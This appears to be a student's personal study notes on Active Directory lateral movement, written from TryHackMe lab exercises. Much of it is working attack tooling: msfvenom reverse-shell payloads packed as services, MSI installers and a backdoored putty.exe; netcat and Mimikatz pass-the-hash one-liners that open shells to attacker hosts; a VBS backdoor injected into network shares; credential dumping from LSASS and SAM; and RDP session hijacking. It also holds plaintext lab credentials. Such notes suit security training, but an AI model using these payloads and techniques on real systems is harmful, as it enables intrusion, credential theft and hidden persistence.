Owner: 侯智晟 - meowheckerouo@gmail.com [TOC] # Lateral Movement Once we finish the AD enumerate. we can leverage information and move to the Target . During lateral Movement, several action need to do 1. Bypass network restrictions 2. Establish BackDoors 3. Create the confusing and avoid detection. During engagement, we need to pay attention that never using odd identity to access sensitive host when performing lateral movement. **Simple Scenario** If we obtain initial access from the Marketing PC, the next we attempt to access DataBase, but non-developer is restricted by firewall. To overcome this, we need to moving to the DEV-001(High Trust machine (MAC, IP)) to bypass the firewall access control.  ## Common Ways - RDP - SSH - WinRM (Windows Remove Management) - VNC (Virtual Network computing) ## Admin & User Access Control(UCA) UAC -> (User Access Control) Using UAC, application and task always run as non-administrator account. (It will restrict us to escape the privilege from vulnerable software) - Two type of Admin - Local account (Machine Admin) - Domain account (AD Admin) Domain Admin carry the access token to perform the managed task through the Remote connection (If account not carry the token, the windows will deny to privilege action) Local admin account may be restrict permission by UCA, so it may affect our action during the lateral movement. # Spawning Remote Processes There are some techniques that allow us lateral movement to the compromised target ## WAY1: Psexec PORT 445/TCP (SMB) Require Permission: Admin Group Psexec is a light-weight telnet-replacement that lets us execute processes on remote host Download Link: https://learn.microsoft.com/en-us/sysinternals/downloads/psexec  Upload psexec64.exe to Victim and run it as server Connecting the Target Psexec server and invoke cmd.exe process (RPC) ```shell psexec64.exe \\MACHINE_IP -u Administrator -p Mypass123 -i cmd.exe ``` ## Windows Remote Management (WinRM) Port - 5985 TCP(HTTP) - 5986 TCP(HTTPS) Require permission : - Remote Management WinRM -> Web-based protocol WinRM allow us using web-based protocol used to remote invoke PowerShell/cmd process interacting with us ### Command Line ``` winrs.exe -u:Administrator -p:Mypass123 -r:target cmd ``` IF winrs.exe haven't a user and password in current line, it will automatically Using injected credential to establish the session ! ### Powershell We need to create the PS Credential object. Credential Object ``` $username = 'Administrator'; $password = 'Mypass123'; $securePassword = ConvertTo-SecureString $password -AsPlainText -Force; $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword; ``` Establish Session ``` Enter-PSSession -Computername TARGET -Credential $credential ``` Invoke-Command cmdlet cmdlet -> the set of instruction ``` Invoke-Command -Computername TARGET -Credential $credential -ScriptBlock {whoami} ``` ## sc.exe (Windows Stander Tools) Remote server Creation Port 135/49152~65535 (DEP/RPC) 445/TCP (RPC over SMB Name Pipe) 139/TCP (RPC over SMB Name Pipe) Require Privilege: Administrator group SVCCTL (Server Control Management !) Dynamic Port (RPC) EMP (Endpoint Mapper) Client can use the EMP service to determine the port of the SVCCTL service. Using sc establish a new service on the remote host.  If the connection fails, sc.exe will try to reach SVCCTL through the SMB name pipe on port 445 or 139.  ``` sc.exe \\TARGET create THMservice binPath= "net user munra Pass123 /add" start= auto sc.exe \\TARGET start THMservice ``` net user: User Management Tools munra: Account Pass123: Password /add: Adding new user flag \\TARGET: Remote Host Stop the service ``` sc.exe \\TARGET stop THMservice sc.exe \\TARGET delete THMservice ``` ## Scheduled Task Windows Scheduled Task allows remote task creation using the following command. ``` schtasks /s TARGET /RU "SYSTEM" /create /tn "THMtask1" /tr "<command/payload to execute>" /sc ONCE /sd 01/01/1970 /st 00:00 schtasks /s TARGET /run /TN "THMtask1" #Run the Task immediately ``` /sd and /st are not important since we will execute it manually. clear the footprint ``` schtasks /S TARGET /TN "THMtask1" /DELETE /F ``` ## LAB - sc.exe  Initial Access (Jump Host) AD Credential - Account: natasha.howells - Password: Donald2005 SSH Login ``` ssh za\\natasha.howells@thmjmp2.za.tryhackme.com ``` Administrator credential - Account:ZA.TRYHACKME.COM\\t1_leonard.summers - Password:EZpass4ever Our Goal: Using sc.exe move to the IIS server and catch the flag from t1_leonard  sc.exe allow us arbitrary execute command and upload the binary file to service and run it. the binary file will associate with the service. Note-> sc.exe Management will kill the instance which is not a service-executable > Stander .exe and service-executable is different. ### Generate Reverse Shell (service-executable) ``` msfvenom -p windows/shell/reverse_tcp -f exe-service LHOST=10.50.17.167 LPORT=4444 -o meowservice.exe ``` ### Using Smbclient Upload malicious service-executable to IIS server ``` smbclient -c 'put meowservice.exe' -U t1_leonard.summers -W ZA '//thmiis.za.tryhackme.com/admin$/' ``` password ->EZpass4ever  ### Establish the Listener ``` msfconsole msf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set LHOST lateralmovement msf6 exploit(multi/handler) > set LPORT 4444 msf6 exploit(multi/handler) > set payload windows/shell/reverse_tcp msf6 exploit(multi/handler) > exploit ``` Alternate (one-line) ``` msfconsole -q -x "use exploit/multi/handler; set payload windows/shell/reverse_tcp; set LHOST lateralmovement; set LPORT 4444;exploit" ```  #### Using JumpHost Ad credential to run sc.exe Administrator Credential (stable Shell) ``` runas /netonly /user:ZA.TRYHACKME.COM\t1_leonard.summers "c:\tools\nc64.exe -e cmd.exe 10.50.17.167 4443" ```  Receive the reverse shell form the Jump2 as admin Runas(t1 Credential !!)   ### Start the Malicious service-executable ```shell-session sc.exe \\thmiis.za.tryhackme.com create MeowService2 binPath= "%windir%\meowservice.exe" start= auto ``` ```shell-session sc.exe \\thmiis.za.tryhackme.com start MeowService2 ```    Solve!! ## LAB - WinRM Jump Host (Initial Credential) Username: jasmine.stanley Password: G0O6Zd5aM ``` ssh za\\jasmine.stanley@thmjmp2.za.tryhackme.com ``` Domain Admin User: ZA.TRYHACKME.COM\t1_leonard.summers Password: EZpass4ever Lateral Target : thmiis.za.tryhackme.com ### Command prompt ``` winrs -? ```  ``` winrs.exe -u:t1_leonard.summers -p:EZpass4ever -r:thmiis.za.tryhackme.com cmd ```   ??? ## LAB - Psexec   ``` psexec64.exe \\10.200.51.201 -u t1_leonard.summers -p EZpass4ever -i cmd.exe ```  # WMI (Windows Management Instrument) WMI is Windows management Tools, allowing to perform management tasks that attackers can abuse for lateral movement! ## Connected to WMI (Powershell) ### Creating Credential Object Before connecting to WMI, we need to create a credential object and save it into a variable for the authentication. ``` $username = 'Administrator'; $password = 'Mypass123'; $securePassword = ConvertTo-SecureString $password -AsPlainText -Force; $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword; ``` ### Establish Session Setting the session ``` $Opt = New-CimSessionOption -Protocol DCOM $Session = New-Cimsession -ComputerName TARGET -Credential $credential -SessionOption $Opt -ErrorAction Stop ``` TARGET -> Replace to the target we want to lateral move Opt -> Session option (New session and setting protocol). ## Remote Process invoke (Powershell) Requirement: - Port - 135/TCP <-----------> 49152-65535/TCP(DCERPC) - 5985(HTTP/WMI) 5986(HTTPS?WMI) - Required Group Membership - Administrator Using WMI invoke the powershell. ``` $Command = "powershell.exe -Command Set-Content -Path C:\text.txt -Value munrawashere"; Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{ CommandLine = $Command } ``` **WMI won't show the any output**, but it will indeed create the command interpreter and execute the command. ## Invoke Remote Process (Command prompt) On the old systems ``` wmic.exe /user:Administrator /password:Mypass123 /node:TARGET process call create "cmd.exe /c calc.exe" ``` ## Run Remote Services (Power Shell) - Port - 135/TCP <-----------> 49152-65535/TCP(DCERPC) - 5985(HTTP/WMI) 5986(HTTPS?WMI) - Required privilege - Administrator Group Setting Service ``` Invoke-CimMethod -CimSession $Session -ClassName Win32_Service -MethodName Create -Arguments @{ Name = "THMService2"; DisplayName = "THMService2"; PathName = "net user munra2 Pass123 /add"; # Your payload ServiceType = [byte]::Parse("16"); # Win32OwnProcess : Start service in a new process StartMode = "Manual" } ``` Launch the service!! ``` $Service = Get-CimInstance -CimSession $Session -ClassName Win32_Service -filter "Name LIKE 'THMService2'" Invoke-CimMethod -InputObject $Service -MethodName StartService ``` Stop & Delete the service ``` Invoke-CimMethod -InputObject $Service -MethodName StopService Invoke-CimMethod -InputObject $Service -MethodName Delete ``` ## Scheduled Task Requirement: - Port - 135/TCP <-----------> 49152-65535/TCP(DCERPC) - 5985(HTTP/WMI) 5986(HTTPS?WMI) - Required Group Membership - Administrator Using the comlet (Default install in Windows) to create the scheduled task. ``` # Payload must be split in Command and Args $Command = "cmd.exe" $Args = "/c net user munra22 aSdf1234 /add" $Action = New-ScheduledTaskAction -CimSession $Session -Execute $Command -Argument $Args Register-ScheduledTask -CimSession $Session -Action $Action -User "NT AUTHORITY\SYSTEM" -TaskName "THMtask2" Start-ScheduledTask -CimSession $Session -TaskName "THMtask2" ``` cmd.exe -> /c close the cmd windows after the commend is done Delete the task after the it has been used ``` Unregister-ScheduledTask -CimSession $Session -TaskName "THMtask2" ``` ## Install MSI package Requirement: - Port - 135/TCP <-----------> 49152-65535/TCP(DCERPC) - 5985(HTTP/WMI) 5986(HTTPS?WMI) - Required Group Membership - Administrator MSI is a file format for installers. If we can pass the malicious MSI file to the target, we can use WMI to invoke win32_Product to install it remotely! Power shell ``` Invoke-CimMethod -CimSession $Session -ClassName Win32_Product -MethodName Install -Arguments @{PackageLocation = "C:\Windows\myinstaller.msi"; Options = ""; AllUsers = $false} ``` Command Prompt ``` wmic /node:TARGET /user:DOMAIN\USER product call install PackageLocation=c:\Windows\myinstaller.msi ``` ## LAB- WMI - Install MSI package / IIS2 Service Goal: Lateral move to IIS2 Jump-HOST-Normal AD-Credential Username: rachael.atkinson Password: Zjqf3489 Administrator Group -> Leverage WMI **User:** ZA.TRYHACKME.COM\\t1_corine.waters **Password:** Korine.1994 Work Flow  ### Generate Reverse Shell & Listening & Upload to Target via smbclient Generating Reverse Shell ``` msfvenom -p windows/x64/shell_reverse_tcp LHOST=lateralmovement LPORT=4445 -f msi > meowinstaller.msi ``` Upload MSI to Target via SMB (Admin Permission) Up load Malicious file to admin public file `//thmiis.za.tryhackme.com/admin$/` ``` smbclient -c 'put meowinstaller.msi' -U t1_corine.waters -W ZA '//thmiis.za.tryhackme.com/admin$/' ``` passwor: Korine.1994  Listening Handler ``` msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/shell_reverse_tcp; set LHOST lateralmovement; set LPORT 4445;exploit" ``` ### Jump to JumpHost ``` za\\<AD Username>@thmjmp2.za.tryhackme.com ``` ### Connect to WMI Credential ``` $username = 't1_corine.waters'; $password = 'Korine.1994'; $securePassword = ConvertTo-SecureString $password -AsPlainText -Force; $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword; ```  Establish session with the target machine. ``` $Opt = New-CimSessionOption -Protocol DCOM $Session = New-Cimsession -ComputerName thmiis.za.tryhackme.com -Credential $credential -SessionOption $Opt -ErrorAction Stop ``` Install the Malicious WMI to obtian the revers shell ``` Invoke-CimMethod -CimSession $Session -ClassName Win32_Product -MethodName Install -Arguments @{PackageLocation = "C:\Windows\meowinstaller.msi"; Options = ""; AllUsers = $false} ```    Get the Flag !!!!!  Solved !! ## LAB WMI - Remote Process Invoke GOAL: thmiis.za.tryhackme.com Jump HOST Username: rachael.atkinson Password: Zjqf3489 ``` ssh za\\rachael.atkinson@thmjmp2.za.tryhackme.com ``` Administrator Group User: ZA.TRYHACKME.COM\\t1_corine.waters Password:Korine.1994 Command Prompt ``` wmic.exe /user:t1_corine.waters /password:Korine.1994 /node:thmiis.za.tryhackme.com process call create "cmd.exe /c calc.exe" ```  幹 --- Powershell ``` Powershell $username = 't1_corine.waters; $password = 'Korine.1994'; $securePassword = ConvertTo-SecureString $password -AsPlainText -Force; $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword; ``` # NTLM HASH/Ticket (Alternative Material Methods) Alternative Material is mean any piece of data can be used to access the windows account without knowing the account's password NTLM Authentication Kerberos Authentication ## Movement - Pass-the-HASH(PtH) If using the local account, the server have account password's hash, server can verify the response without interaction with domain controller  Once we compromise the host, we will attempt to extract the hash or credential via Mimikatz. If Mimikatz can't crack the NTLM Hash, we can attempt pass the NTLM hash to bypass Authentication. ### Extract the NTLM HASH From SAM Extract the NTLM Hash from Local SAM(Security Account Management) or LSASS(Local Security Authentication Subsystems Service) memory. Local SAM only have local account NTLM Hash Running Mimikatz tools as Local Account ``` mimikatz # privilege::debug #Privilege escalation mimikatz # token::elevate mimikatz # lsadump::sam ``` ``` RID : 000001f4 (500) User : Administrator Hash NTLM: 145e02c50333951f71d13c245d352b50 ``` Local Account NTLM Hash -> 145e02c50333951f71d13c245d352b50 ### Extracting the NTLM Hash from LSASS memory This methods allow us to extract local and domain's user NTLM Hash ``` mimikatz # privilege::debug mimikatz # token::elevate mimikatz # sekurlsa::msv ```  ### Pass NTLM HSAH (Windows) Launch the listener ``` user@AttackBox$ nc -lvp 5555 ``` Using response to login remote machine and run arbitrary command. ```shell= mimikatz # token::revert mimikatz # sekurlsa::pth /user:bob.jenkins /domain:za.tryhackme.com /ntlm:6b4a57f67805a663c818106dc0648484 /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 5555" ``` If we run the whoami command on this shell, it will still show us the original user, but any command run from here will actually use the credentials we injected. Run the command in the shell that we receive (Lateral movement) Move to -> THMIIS ``` winrs.exe -r:THMIIS.za.tryhackme.com cmd ``` If we not specify the credential, winrs will use the credential that was injected in current session. ### Passing NTLM Hash (LINUX) Way 1 - RDP ``` xfreerdp /v:VICTIM_IP /u:DOMAIN\\MyUser /pth:NTLM_HASH ``` Way 2 - psexec ``` psexec.py -hashes NTLM_HASH DOMAIN/MyUser@VICTIM_IP ``` Only linux version of pexec support PtH Way 3 - WinRM ``` evil-winrm -i VICTIM_IP -u MyUser -H NTLM_HASH ``` ---- ## Movement - Pass Ticket Attack (Kerberos) LSASS (Local Security Authentication Subsystems Service) Sometime we extract the ticket from LSASS.exe using mimikatz, but we typically need Systems permission. ``` mimikatz # privilege::debug mimikatz # sekurlsa::tickets /export ``` Notice: Ticket and session key both are necessary, Otherwise we can't use the ticket Primary Goal -> Extract the TGT(Access Any Service) : Require Admin privilege. -> TGS(Specific Service) : Require Low-Privilege Account. ### Injection Ticket in Current Session ``` mimikatz # kerberos::ptt [0;427fcd5]-2-0-40e10000-Administrator@krbtgt-ZA.TRYHACKME.COM.kirbi ``` ### Check if the ticket were correctly injected! ``` klist ```  ## Over-the-Hash/ Pass the key This attack is similar to PtH but applied to Kerberos Network ## LAB - Pass The Ticket (ptt Attack) Jump Host - Initial Access User: ZA.TRYHACKME.COM\\t2_felicia.dean Password: iLov3THM! ssh za\\t2_felicia.dean@thmjmp2.za.tryhackme.com Goal -> t1_toby.beck.  Stable Shell Attack Host ``` nc -lvnp 4444 ``` ``` nc64.exe -e cmd.exe 10.50.49.180 4444 ``` Systems User (Default) ``` privilege::debug ```  South out Target Ticket ``` sekurlsa::tickets /export ```  TGT ???????????  Inject Ticket in Current session ``` kerberos::ptt [0;160f71]-0-0-40a10000-tony.holland@HOST-thmiis.za.tryhackme.com.kirbi ```    Fail since Tony.Holland privilege is too low, but theoretically this attack is feasible. ## LAB - NTLM Pass the Hash Jump Host Credential User: ZA.TRYHACKME.COM\\t2_felicia.dean Password: iLov3THM! ssh za\\t2_felicia.dean@thmjmp2.za.tryhackme.com    Extracting Local SAM ``` privilege::debug token::elevate #Grep Process and Treading Token ```  Extracting LSASS memory ``` sekurlsa::msv ```  ## Return shell with Injected NTLM hash ``` token::revert sekurlsa::pth /user:t1_toby.beck /domain:za.tryhackme.com /ntlm:533f1bd576caa912bdb9da284bbc60fe /run:"c:\tools\nc64.exe -e cmd.exe 10.50.49.180 4444" ```   Although, whoamu command will show us the original user we login, Actually the credential has been injected using PtH.  ``` winrs.exe -r:THMIIS.za.tryhackme.com cmd ``` If you didn't specific the credential. winrs will use current credential to our session!   Solved! # User Misconfiguration In certain situations, we can exploit misconfigured to perform lateral movement to arrive our goal. ## Writable shares folder Within the company internal network, Some Network share typically writable allow users to perform some day-to-day task. We can attempt to write or upload malicious file into share folder.  Finding scripts or executable files hosted on network shares. Putty Property  Even though the backdoor is hosted on the server,we also can use script to copied it from the server into Victims's %temp% folder and executed backdore on Victims. ### Backdooring -VBS Script If the shared resource is a VB script, we can copy Necat to the same share path and inject the following code into the VBS script: ``` CreateObject("WScript.Shell").Run "cmd.exe /c copy /Y \\10.10.28.6\myshare\nc64.exe %tmp% & %tmp%\nc64.exe -e cmd.exe <attacker_ip> 1234", 0, True ``` This will copy nc64.exe from the share to the user's workstation %tmp% directory and send a reverse shell back. ### Backdooring .exe Files If the share file is windows binary file, we can download the binary file from network share and use msfvenom to inject a backdoor into it. putty.exe for example ``` msfvenom -a x64 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=<attacker_ip> lport=4444 -b "\x00" -f exe -o puttyX.exe ``` puttyX.exe will execute a reverse_tcp meterpreter payload without the user noticing it. Once the file has been generated, we can replace the executable on the Windows share and wait for any connections using the exploit/multi/handler module from Metasploit. ## RDP Hijacking (Windows Server 2019) allow us to connect to another user's session without password. When a user directly closes the RDP window without logging out, the session won't be closed immediately. Thus, we can leverage this to hijack the session to move. Before we started , running the shell as an administrator.  ### Launch Psexec ``` PsExec64.exe -s cmd.exe ``` -s: Run the remote process in the System account. ### List the existing Session on a server ``` query user ```  ### Take over the session Take over Luke's session as an administrator user: ``` tscon 3 /dest:rdp-tcp#6 ``` Note: User will be forced out of current session. ## LAB - RDP Hijack Jump host-Admin Username: t2_kelly.blake Password: 8LXuPeNHZFFG RDP Session ``` xfreerdp /v:thmjmp2.za.tryhackme.com /u:t2_kelly.blake /p:8LXuPeNHZFFG ```  ``` cd /tools ```  Run the PsExec ``` PsExec64.exe -s cmd.exe ```  Takeover the session ``` tscon 2 /dest:rdp-tcp#4 ```  Solved !! # Port Forwarding (Bypass Firewall Rules) Most lateral movement require the specific port for movement such as (SMB:445, RPC:111, RDP:3389, WinRM:5985) However,those Port are often blocked by IT manager.(Firewall Rule s) To address these issue, we can utilize port forwarding technique to bypass port blocked. ## SSH Tunnel Auth via ssh (Way-1) 2 key pair  Auth (Way -2) 1 Key pair  Both of Linux and windows(openSSH) support ssh protocol by default.  we have low privilege access right in PC-1(www-data) ### Adding a new user for tunnel purpose (System Account for Tunnel. Not allow to run the interacting shell) On our Attacker server (ssh Server, Systems Account) ``` useradd tunneluser -m -d /home/tunneluser -s /bin/true passwd tunneluser ``` m : --create-home Creating home directory. d : --home-dir $HOME_DIR s : --shell : Specify the type of shell /bin/true won't be able to run command in shell, because /bin/true always returns a successful exit status. ### Remote Port Forwarding Remote Port forwarding allow client mapping its access port to SSH server.  ``` ssh tunneluser@1.1.1.1 -R 3389:3.3.3.3:3389 -N ``` N :Do not execute a remote command tunneluser is a systems account we created doesn't have permission to run the command on our machine. Connect to Remote server via RDP protocol ``` xfreerdp /v:127.0.0.1 /u:MyUser /p:MyPassword ``` ### Local Port Forwarding Local Port Forwarding allows us to exposure port to receive reverse shell  ``` ssh tunneluser@1.1.1.1 -L *:8000:127.0.0.1:8000 -N ``` Due to we opened a new port on compromised machine, we need to modify firewall rules for incoming connections.  (Require Local account privilege) ``` netsh advfirewall firewall add rule name="Open Port 8000" dir=in action=allow protocol=TCP localport=8000 ``` ## Socat ### Port Forward we need to transfer socat.exe to the compromised host. it wail increase the opportunity be detected by AV or IDS. ``` socat TCP4-LISTEN:3389,fork TCP4:3.3.3.3:3389 ```  ``` xfreerdp /v:2.2.2.2 /u:MyUser /p:MyPassword ``` Fork option is allow the socat to create new process for each connection received. ``` netsh advfirewall firewall add rule name="Open Port 3389" dir=in action=allow protocol=TCP localport=3389 ``` ### Expose Port Attacker port (Receive reverse shell)  ``` socat TCP4-LISTEN:8000,fork TCP4:1.1.1.1:8000 ``` Modify firewall rules ``` netsh advfirewall firewall add rule name="Open Port 8000" dir=in action=allow protocol=TCP localport=8000 ``` ## Dynamic Port forwarding (Socket Proxy)  Dynamic port forwarding allow us to perform Port scanning attack in the Attacker PC  ``` C:\> ssh tunneluser@1.1.1.1 -R 9050 -N ``` Attacker Proxy Configuration Default path: /etc/proxychains4.conf ``` vim /etc/proxychains4.conf ```  Execute the command through the proxy server(Jump Host) ``` proxychains curl http://pxeboot.za.tryhackme.com ``` Note that some softwares such as nmap that might not good well with the SOCKS proxy in some circumstances. ## LAB TARGET  thmiis.za.tryhackme.com ping 10.200.122.201 ``` ATTACKER_INTERFACE="lateralmovement" ATTACKER_IP=$(ip addr show $ATTACKER_INTERFACE | awk '/inet / {print $2}' | cut -d '/' -f 1) echo "ATTACKE IP: $ATTACKER_IP" AD_DOMAIN_NAME='za.tryhackme.com' DC_IP=10.200.122.101 DNS_IP=10.200.122.101 nslookup $Domain_Name $DNS_IP ```  Get AD Credential http://distributor.za.tryhackme.com/creds Username: jasmine.stanley Password: G0O6Zd5aM ``` AD_USER=jasmine.stanley ssh za\\$AD_USER@thmjmp2.za.tryhackme.com ``` ### Creating Tunnel User ``` useradd meowtunnel -m -d /home/meowtunnel -s /bin/true passwd meowtunnel ``` meowtunnel:meowpass ### Dynamic Port Forwarding (ProxyChains) ``` ssh meowtunnel@10.50.119.185 -R 9050 -N ```   ``` vim /etc/proxychains4.conf ```  ``` proxychains curl thmiis.za.tryhackme.com ```   ``` #Pivoting Host nslookup thmiis.za.tryhackme.com #Attacker HOST proxychains nmap -n -Pn -sT 10.200.122.201 ```   ## Enumerate ``` net user /domain net user t1_thomas.moore /domain ```   we know t1_thomas.moore:MyPazzw3rd2020 ``` proxychains xfreerdp /dynamic-resolution +clipboard /cert:ignore /v:thmiis.za.tryhackme.com:3389 /u:t1_thomas.moore /p:MyPazzw3rd2020 ```  thmiis.za.tryhackme.com -> run Netstat  ## LAB - Exploit (HTP:RCE /Require web shell upload)